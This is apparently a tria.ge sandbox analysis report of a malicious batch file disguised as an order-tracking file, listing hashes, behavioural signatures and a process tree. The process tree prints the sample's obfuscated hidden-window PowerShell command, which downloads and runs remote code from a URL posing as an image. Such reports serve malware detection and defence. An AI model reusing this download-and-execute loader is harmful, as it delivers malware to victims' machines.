Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
43s -
max time network
45s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
10/09/2022, 15:56
Static task
static1
Behavioral task
behavioral1
Sample
TRACK-ORDER#114-85737.bat
Resource
win7-20220812-en
4 signatures
150 seconds
General
-
Target
TRACK-ORDER#114-85737.bat
-
Size
65KB
-
MD5
44d81d1aecc0e4b0aa0f9ad726a02e99
-
SHA1
eebf5c17f72ee3a323619f45dd1db9d03a417c37
-
SHA256
4d634f419ee6d84324dccb8c2bbe3ed583220a676c92b1facf34bc749b4a9712
-
SHA512
6aff752752bdc92478e336c4e71e6d77ada065a76e255e84070834bcdcca52d296cc22d7f778d1dd1cc859b31716fb5a08325977cda550d2ab5da6d490121cb2
-
SSDEEP
192:nyj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj/:4
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 4 1568 powershell.exe 5 1568 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1568 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1568 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1948 wrote to memory of 2024 1948 cmd.exe 29 PID 1948 wrote to memory of 2024 1948 cmd.exe 29 PID 1948 wrote to memory of 2024 1948 cmd.exe 29 PID 2024 wrote to memory of 1568 2024 cmd.exe 30 PID 2024 wrote to memory of 1568 2024 cmd.exe 30 PID 2024 wrote to memory of 1568 2024 cmd.exe 30
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\TRACK-ORDER#114-85737.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Windows\system32\cmd.exeCMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$Whnj='IEX(NEW-OBJECT NET.W';$edKw='EBCLIENT).DOWNLO';[BYTE[]];$ARsr='TUUL(''https://surveydatabd.com/img/im.png'')'.REPLACE('TUUL','ADSTRING');[BYTE[]];IEX($Whnj+$edKw+$ARsr)2⤵
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$Whnj='IEX(NEW-OBJECT NET.W';$edKw='EBCLIENT).DOWNLO';[BYTE[]];$ARsr='TUUL(''https://surveydatabd.com/img/im.png'')'.REPLACE('TUUL','ADSTRING');[BYTE[]];IEX($Whnj+$edKw+$ARsr)3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1568
-
-